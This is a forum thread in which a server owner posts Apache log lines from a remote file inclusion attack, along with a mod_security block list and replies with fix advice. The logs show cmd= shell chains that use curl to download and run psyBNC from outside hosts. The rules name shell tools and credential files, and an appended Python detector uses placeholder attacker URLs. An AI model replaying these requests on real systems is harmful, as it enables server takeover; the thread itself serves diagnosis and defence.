  1. #1
    Member
    Join Date
    Aug 2003
    Location
    Israel
    Posts
    19

    server hacked

    Hello,

    Today my server was hacked:
    201.5.212.224 - - [11/Oct/2005:00:48:58 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;curl%20-o%20psybnc.tar.gz%20lgbos.100free.com/psybnc.tar.gz;tar%20-zxvf%20psybnc.tar.gz HTTP/1.1" 200 14964 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    201.5.212.224 - - [11/Oct/2005:00:49:52 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;rm%20-rf%20psybnc.tar.gz HTTP/1.1" 200 5997 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    201.5.212.224 - - [11/Oct/2005:00:50:54 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;curl%20-o%20psybnc.tar.gz%20http://www.psychoid.lam3rz.de/psyBNC2.3.2-4.tar.gz HTTP/1.1" 200 6472 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    201.5.212.224 - - [11/Oct/2005:00:51:27 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;tar%20-xvzf%20psybnc.tar.gz HTTP/1.1" 200 15481 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    201.5.212.224 - - [11/Oct/2005:00:51:42 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;cd%20psybnc;make;pico%20psybnc.conf;./psybnc HTTP/1.1" 200 6129 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    201.5.212.224 - - [11/Oct/2005:00:52:50 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;rm%20-rf%20psybnc HTTP/1.1" 200 5997 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    201.5.212.224 - - [11/Oct/2005:00:53:40 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;curl%20-o%20psybnc.tar.gz%20http://www.geocities.com/sorin_smen/psybnc.tgz HTTP/1.1" 200 6867 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    201.5.212.224 - - [11/Oct/2005:00:53:47 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;tar%20-zxvf%20psybnc.tgz;cd%20psybnc;./psybnc HTTP/1.1" 200 6045 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    201.5.212.224 - - [11/Oct/2005:00:54:02 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp/psybnc;./psybnc HTTP/1.1" 200 6045 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    201.5.212.224 - - [11/Oct/2005:00:54:07 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp/psybnc;ls HTTP/1.1" 200 6147 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"


    I have modsec.user.conf, but it does not help. Why?

    # Require HTTP_USER_AGENT and HTTP_HOST in all requests
    # SecFilterSelective "HTTP_USER_AGENT|HTTP_HOST" "^$"

    # Require Content-Length to be provided with
    # every POST request
    SecFilterSelective REQUEST_METHOD "^POST$" chain
    SecFilterSelective HTTP_Content-Length "^$"

    # Don't accept transfer encodings we know we don't handle
    # (and you don't need it anyway)
    SecFilterSelective HTTP_Transfer-Encoding "!^$"

    # Protecting from XSS attacks through the PHP session cookie
    SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
    SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"

    SecFilter "viewtopic\.php\?" chain
    SecFilter "chr\(([0-9]{1,3})\)" "deny,log"

    # Block various methods of downloading files to a server
    SecFilterSelective THE_REQUEST "wget "
    SecFilterSelective THE_REQUEST "lynx "
    SecFilterSelective THE_REQUEST "scp "
    SecFilterSelective THE_REQUEST "ftp "
    SecFilterSelective THE_REQUEST "cvs "
    SecFilterSelective THE_REQUEST "rcp "
    SecFilterSelective THE_REQUEST "telnet "
    SecFilterSelective THE_REQUEST "ssh "
    SecFilterSelective THE_REQUEST "echo "
    SecFilterSelective THE_REQUEST "links -dump "
    SecFilterSelective THE_REQUEST "links -dump-charset "
    SecFilterSelective THE_REQUEST "links -dump-width "
    SecFilterSelective THE_REQUEST "links http:// "
    SecFilterSelective THE_REQUEST "links ftp:// "
    SecFilterSelective THE_REQUEST "links -source "
    SecFilterSelective THE_REQUEST "mkdir "
    SecFilterSelective THE_REQUEST "cd /tmp "
    SecFilterSelective THE_REQUEST "cd /var/tmp "
    SecFilterSelective THE_REQUEST "cd /etc/httpd/proxy "


    # WEB-ATTACKS ps command attempt
    SecFilterSelective THE_REQUEST "/bin/ps"

    # WEB-ATTACKS /bin/ps command attempt
    SecFilterSelective THE_REQUEST "ps\x20"

    # WEB-ATTACKS wget command attempt
    SecFilter "wget\x20"

    # WEB-ATTACKS uname -a command attempt
    SecFilter "uname\x20-a"

    # WEB-ATTACKS /usr/bin/id command attempt
    SecFilter "/usr/bin/id"

    # WEB-ATTACKS id command attempt
    SecFilter "\;id"

    # WEB-ATTACKS echo command attempt
    SecFilter "/bin/echo"

    # WEB-ATTACKS kill command attempt
    SecFilter "/bin/kill"

    # WEB-ATTACKS chmod command attempt
    SecFilter "/bin/chmod"

    # WEB-ATTACKS chgrp command attempt
    SecFilter "/chgrp"

    # WEB-ATTACKS chown command attempt
    SecFilter "/chown"

    # WEB-ATTACKS chsh command attempt
    SecFilter "/usr/bin/chsh"

    # WEB-ATTACKS tftp command attempt
    SecFilter "tftp\x20"

    # WEB-ATTACKS /usr/bin/gcc command attempt
    SecFilter "/usr/bin/gcc"

    # WEB-ATTACKS gcc command attempt
    SecFilter "gcc\x20-o"

    # WEB-ATTACKS /usr/bin/cc command attempt
    SecFilter "/usr/bin/cc"

    # WEB-ATTACKS cc command attempt
    SecFilter "cc\x20"

    # WEB-ATTACKS /usr/bin/cpp command attempt
    SecFilter "/usr/bin/cpp"

    # WEB-ATTACKS cpp command attempt
    SecFilter "cpp\x20"

    # WEB-ATTACKS /usr/bin/g++ command attempt
    SecFilter "/usr/bin/g\+\+"

    # WEB-ATTACKS g++ command attempt
    SecFilter "g\+\+\x20"

    # WEB-ATTACKS bin/python access attempt
    SecFilter "bin/python"

    # WEB-ATTACKS python access attempt
    SecFilter "python\x20"

    # WEB-ATTACKS bin/tclsh execution attempt
    SecFilter "bin/tclsh"

    # WEB-ATTACKS tclsh execution attempt
    SecFilter "tclsh8\x20"

    # WEB-ATTACKS bin/nasm command attempt
    SecFilter "bin/nasm"

    # WEB-ATTACKS nasm command attempt
    SecFilter "nasm\x20"

    # WEB-ATTACKS /usr/bin/perl execution attempt
    SecFilter "/usr/bin/perl"

    # WEB-ATTACKS perl execution attempt
    SecFilter "perl\x20"

    # WEB-ATTACKS nt admin addition attempt
    SecFilter "net localgroup administrators /add"

    # WEB-ATTACKS traceroute command attempt
    SecFilter "traceroute\x20"

    # WEB-ATTACKS ping command attempt
    SecFilter "/bin/ping"

    # WEB-ATTACKS netcat command attempt
    SecFilter "nc\x20"

    # WEB-ATTACKS nmap command attempt
    SecFilter "nmap\x20"

    # WEB-ATTACKS xterm command attempt
    SecFilter "/usr/X11R6/bin/xterm"

    # WEB-ATTACKS X application to remote host attempt
    SecFilter "\x20-display\x20"

    # WEB-ATTACKS lsof command attempt
    SecFilter "lsof\x20"

    # WEB-ATTACKS rm command attempt
    SecFilter "rm\x20"

    # WEB-ATTACKS mail command attempt
    SecFilter "/bin/mail"

    # WEB-ATTACKS mail command attempt
    SecFilter "mail\x20"

    # WEB-ATTACKS /bin/ls command attempt
    SecFilterSelective THE_REQUEST "/bin/ls"

    # WEB-ATTACKS /etc/inetd.conf access
    SecFilter "/etc/inetd\.conf" log,pass

    # WEB-ATTACKS /etc/motd access
    SecFilter "/etc/motd" log,pass

    # WEB-ATTACKS /etc/shadow access
    SecFilter "/etc/shadow" log,pass

    # WEB-ATTACKS conf/httpd.conf attempt
    SecFilter "conf/httpd\.conf" log,pass

    # WEB-ATTACKS .htgroup access
    SecFilterSelective THE_REQUEST "\.htgroup" log,pass

    #PHP-NUKE spam filter
    SecFilter "name=WebMail"

    #PHP-NUKE web attack
    SecFilter "cd%20/var/tmp;"

    #PHP-NUKE web attack
    SecFilter "cd%20/var/tmp"

    #PHP-NUKE web attack
    SecFilter "cd%20/tmp"

    #PHP-NUKE web attack
    SecFilter "chmod%204777"

    # phpbb2 shell exploit
    SecFilter "rush="
    SecFilter "highlight=%2527"
    SecFilter "highlight=%2725"
    SecFilter "highlight=%27"

  2. #2
    Member linux-image's Avatar
    Join Date
    Jun 2004
    Location
    India
    Posts
    1,185
    cPanel/Enkompass Access Level

    Root Administrator


    Check if LoadModule is active in httpd.conf.

  3. #3
    Member sh4ka's Avatar
    Join Date
    May 2005
    Posts
    433


    You had better check that the AddModule line for mod_security is not commented out, or whether it exists in the AddModule section at all. Also try to activate all processes listed under "background process killer" at "System Health" in the left WHM menu.

    Is your mod_security installed from the add-on in WHM?

  4. #4
    Member neta5's Avatar
    Join Date
    Oct 2005
    Posts
    34


    You mean it's better that we turn on these items?
    BitchX
    bnc
    eggdrop
    generic-sniffers
    guardservices
    ircd
    psyBNC
    ptlink
    services

  5. #5
    Member
    Join Date
    Aug 2003
    Location
    Israel
    Posts
    19


    Quote Originally Posted by linux-image
    Check if LoadModule is active in httpd.conf.
    It is active; the problem is with the filtering of mod_security.

    In audit_log (the log of mod_security), everything, for example "wget", is denied with code 406.

  6. #6
    Member
    Join Date
    Aug 2003
    Location
    Israel
    Posts
    19


    Quote Originally Posted by sh4ka
    You had better check that the AddModule line for mod_security is not commented out, or whether it exists in the AddModule section at all. Also try to activate all processes listed under "background process killer" at "System Health" in the left WHM menu.

    Is your mod_security installed from the add-on in WHM?

    Yes, installed from WHM.
    I activated all processes listed under "background process killer". Thanks!

  7. #7
    Member
    Join Date
    Aug 2005
    Posts
    42


    The file got dropped by way of curl, so better put

    SecFilterSelective THE_REQUEST "curl "

    into mod_security's conf file

    as that will also stop other non-detected drops.
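The filter list in the first post has rules for wget but none for curl, which is the download tool in every logged request; it also does nothing about the root cause visible in the log, a basepath= parameter that accepts a remote URL (remote file inclusion) and a cmd= parameter carrying a shell chain. The following Python is an added example, not from the thread: it parses constructed Apache combined-log lines shaped like the posted ones (the IPs and hostnames are placeholders) and flags both indicators, so a defender can confirm from the log what the rules missed.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample lines in Apache combined log format. The first two mimic the
# pattern from the thread (remote URL in basepath=, shell chain in cmd=); the
# third is a benign request to the same script that must not be flagged.
SAMPLE_LOG = """\
203.0.113.7 - - [11/Oct/2005:00:48:58 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://attacker.example/shell.gif?&cmd=cd%20/var/tmp;curl%20-o%20x.tar.gz%20http://attacker.example/x.tar.gz HTTP/1.1" 200 14964 "-" "Mozilla/4.0"
203.0.113.7 - - [11/Oct/2005:00:54:07 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://attacker.example/shell.gif?&cmd=cd%20/var/tmp/psybnc;ls HTTP/1.1" 200 6147 "-" "Mozilla/4.0"
198.51.100.9 - - [11/Oct/2005:01:02:11 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=../photos&cat=12 HTTP/1.1" 200 8123 "-" "Mozilla/4.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) ')

# A parameter value that is itself a remote URL: the remote file inclusion indicator.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
# Download tools and shell chaining, matched against the URL-decoded value, so
# %20-encoded spaces (as in the posted log) do not hide the command.
SHELL_RE = re.compile(r'(?:^|[;&|\s])(?:curl|wget|lynx|fetch)\s|cd\s+/(?:var/)?tmp|;\s*(?:ls|make|\./)')


def analyze_line(line):
    """Return the reasons a request looks like RFI / command injection, or [] if clean."""
    m = LOG_RE.match(line)
    if not m:
        return []
    query = urlsplit(m.group('target')).query
    reasons = []
    # Split on '&' only; the cmd= value legitimately contains ';' as a shell separator.
    for field in query.split('&'):
        name, _, value = field.partition('=')
        decoded = unquote(value)
        if REMOTE_URL_RE.match(decoded):
            reasons.append(f'remote URL in {name}=')
        if SHELL_RE.search(decoded):
            reasons.append(f'shell command in {name}=')
    return reasons


def scan(log_text):
    """Return (ip, status, reasons) for every flagged line; clean lines are omitted."""
    hits = []
    for line in log_text.splitlines():
        reasons = analyze_line(line)
        if reasons:
            m = LOG_RE.match(line)
            hits.append((m.group('ip'), int(m.group('status')), reasons))
    return hits
```

A status of 200 on a flagged line means the request reached the script, so the host should be treated as compromised regardless of what the filter later starts blocking.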
